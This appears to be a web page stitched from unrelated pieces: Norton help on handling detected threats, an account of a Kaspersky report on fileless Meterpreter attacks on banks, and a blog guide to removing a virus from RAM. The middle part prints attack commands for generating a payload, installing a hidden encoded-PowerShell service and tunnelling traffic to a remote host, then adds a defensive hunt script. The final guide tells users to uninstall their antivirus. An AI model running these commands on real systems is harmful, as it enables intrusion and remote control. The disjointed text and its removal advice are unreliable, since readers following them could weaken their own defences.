“Invisible” malware does not leave files, hides in memory and attacks large companies. View and fix device security threats detected by Norton

When Norton detects a threat, the program automatically removes it, unless your intervention is necessary to determine how to handle the threat. In such cases, Norton displays a "Threats Detected" or "Security Threat" notification with options available to respond to the threat.

View threats that were automatically removed during scanning

    Launch Norton.

    If the My Norton window appears, next to the Device Security section, click Open.

    In the Security log window, in the Show list, select Resolved security threats.

    Select a threat from the list and view the actions taken in the Details pane.

In some cases, instead of automatically resolving a threat, Norton recommends that you take a specific action to resolve it.

Fixing threats that were not eliminated during scanning

    Launch Norton.

    If the My Norton window appears, next to the Device Security section, click Open.

    In the main Norton window, double-click Security and then select Log.

    In the Security log window, in the Show list, select Unresolved security threats.

    If the list contains unresolved threats, select the threat you are interested in.

If you have reason to believe that your system is infected, run Norton Power Eraser. Norton Power Eraser is a powerful malware removal tool that gets rid of the most resistant security threats. For more information, see Run Norton Threat Scan on PC.

Norton Power Eraser is an aggressive malware removal tool. Along with malware, Norton Power Eraser may sometimes remove legitimate files, so review the scan results carefully before deleting any files.

By default, Norton removes security threats from your computer and quarantines them. If you have reason to believe that a file was deleted by mistake, you can restore it from quarantine to its original location and exclude it from subsequent scans.

Restoring a file from quarantine

    Launch Norton.

    If the My Norton window appears, next to the Device Security section, click Open.

    In the main Norton window, click Security and then select Log.

    In the Security log window, expand the Show menu and select the Quarantine option.

    Select the file you want to restore.

    In the Details pane, click Options.

    In the Threat detected window, select the Recover and exclude this file option.

    In the Recovery from quarantine window, click the Yes button.

    In the Browse for Folder window, select a folder or drive to place the recovered file and click OK.

about a new, interesting malicious campaign that affected banks, telecoms, government agencies, as well as other companies and organizations in more than forty countries around the world.

Analysts from the GReAT team write that a bank's security team was the first to notice the threat: Meterpreter code was found in the physical memory of a domain controller. Kaspersky Lab products detect such threats as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. As the analysts dug in to figure out where the code in memory came from, they also discovered PowerShell scripts stored in the Windows registry, and found that the NETSH utility had been used to tunnel traffic to the attackers' command-and-control server.

Such attacks are called “fileless”, that is, the malware does not place any files on the hard drive; instead, the payload is injected directly into memory and exists inside RAM. Of course, such an attack is extremely difficult to detect and track.

Attack pattern

The researchers explain that the well-known Metasploit framework can be used to create scripts like the example below.

Such scripts help to inject Meterpreter into RAM. Msfvenom from Metasploit can be used to generate them:

Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

Once the script is generated, the attackers use Windows SC to install a malicious service on the target host (which will ultimately execute the above script). This can be done, for example, using the following command:

sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA...” start= manual

The next step is to configure tunneling so that the infected machine becomes accessible to the remote host. To do this, attackers resort to the following command:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0

As a result, all network traffic arriving at 10.10.1.11:4444 will be redirected to 10.10.1.12:8080. This technique sets up a proxy tunnel through which the criminals can remotely control the infected host via PowerShell.

Analysts note that using SC and NETSH requires administrator privileges on the local and remote host. Using malicious PowerShell scripts will also require escalation of privileges and changes to the execution policy. To do this, attackers resort to using the Mimikatz credential dumper, collecting passwords from accounts on the local machine and surrounding workstations.
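As an added example, not taken from the Kaspersky report, the following PowerShell hunt checks a Windows host for the three artifacts the attack pattern above leaves behind: a service whose command line launches hidden or encoded PowerShell, persistent netsh portproxy rules (netsh stores them in the registry, so they survive reboots), and Run/RunOnce autoruns that invoke PowerShell. It assumes it is run in an elevated session on the host being inspected; the registry paths are the standard Windows locations, not values from the report.

```powershell
# Added host hunt (not part of the original report). Run elevated on the host being checked.

# 1. Services whose ImagePath launches PowerShell with hidden/non-profile/encoded switches,
#    which is what the SC-installed service in the report looks like.
$suspiciousSvc = Get-CimInstance Win32_Service |
    Where-Object {
        $_.PathName -match 'powershell' -and
        $_.PathName -match '-(nop|w\s+hidden|e(nc(odedcommand)?)?)\b'
    } |
    Select-Object Name, StartMode, PathName

# 2. Persistent portproxy rules. "netsh interface portproxy show v4tov4" prints the same data,
#    but reading the registry directly does not depend on netsh being intact.
$ppKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
$portProxy = if (Test-Path $ppKey) {
    (Get-ItemProperty $ppKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |          # drop PSPath/PSProvider metadata
        ForEach-Object {
            [pscustomobject]@{ Listen = $_.Name; ConnectTo = $_.Value }  # e.g. 0.0.0.0/4444 -> 10.10.1.12/8080
        }
}

# 3. Autorun entries that invoke PowerShell (registry-resident stagers are loaded from here).
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$autoruns = foreach ($k in $runKeys) {
    if (Test-Path $k) {
        (Get-ItemProperty $k).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' -and "$($_.Value)" -match 'powershell' } |
            ForEach-Object { [pscustomobject]@{ Key = $k; Name = $_.Name; Command = $_.Value } }
    }
}

"=== Services launching hidden/encoded PowerShell ==="; $suspiciousSvc | Format-Table -AutoSize
"=== Persistent netsh portproxy rules ===";              $portProxy     | Format-Table -AutoSize
"=== Autoruns invoking PowerShell ===";                  $autoruns      | Format-Table -AutoSize
```

Any hit in the portproxy section on a workstation or domain controller deserves immediate attention, since there is rarely a legitimate reason for such a host to forward ports; the other two lists need triage, because administrative tooling does occasionally run PowerShell with -nop or hidden windows.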

Having carefully studied the attack on one of the affected banks, the researchers came to the conclusion that the operators of this campaign used third-level domains, as well as domains in the .GA, .ML, .CF zones. The fact is that such domains are free, which means that attackers do not leave behind WHOIS information.

Summarizing all of the above (the use of Metasploit and standard Windows utilities, and of domains without WHOIS information), the researchers conclude that the tradecraft of the unknown attackers closely resembles the work of groups such as GCMAN and Carbanak. However, there is no direct evidence, so it is not possible to attribute these silent attacks to any specific group.

“Techniques like those described in this report are becoming increasingly common, especially [when attacks are carried out] against large targets in the banking industry. Unfortunately, the use of simple tools, combined with various tricks, makes detecting [such attacks] extremely difficult,” summarize GReAT experts.

A virus in random access memory is an unpleasant and, unfortunately, not uncommon phenomenon. Very often we can see a hidden file but cannot delete it in any way: it keeps reappearing, or the Windows operating system itself does not allow us to delete it.

By the way, this happens much more often when the antivirus is configured incorrectly or is missing altogether. If you are in such a situation, I recommend reading the article on installing and configuring an antivirus on Windows. Before you remove a virus from RAM, it is worth understanding what has happened to the antivirus program installed on your computer. Most likely, your antivirus program was "ruined" by the newly appeared virus. It is also possible that your antivirus program's signature database simply has no method for completely erasing this virus, so the program only attempts to remove the infection it causes, and not the virus itself.

It often happens that a virus copies its programs and additional files elsewhere for its own work, or starts automatically; the antivirus program will then detect these copies, but will not detect the source (the virus itself), and in most cases cannot cope with it.

  1. Remove the installed antivirus program (using the uninstaller in Add/Remove Programs); it is of no use here.
  2. Download CCleaner from the Internet and install it. Start by clearing the temp folders. This software is suitable for ordinary users, so you can check all the boxes in the settings: it will not erase your own data! I wrote more about the program in the article on cleaning the registry.
  3. Next, we will need a virus cleaning utility to help us. I wrote about them in the article on free utilities to remove viruses. Choose any one; for example, download Dr.Web CureIt! from the Internet and install it.
  4. Install the update and run one of the two scans (quick or full). In practice, a quick scan gives an effective result. Remove all viruses that were detected, then reboot the computer.
  5. Download a new antivirus. This is fundamentally important! If before the trouble you had ESET NOD32 Antivirus installed, install Avast or Avira; if Avast was installed, install ESET, or any other antivirus program of your choice.
  6. The reasoning behind these steps is simple: the antivirus program you had was most likely damaged, its data may remain in the registry, and this will lead to inaccurate operation of the antivirus program, especially since this particular antivirus program failed to catch the threat from the Internet on your computer.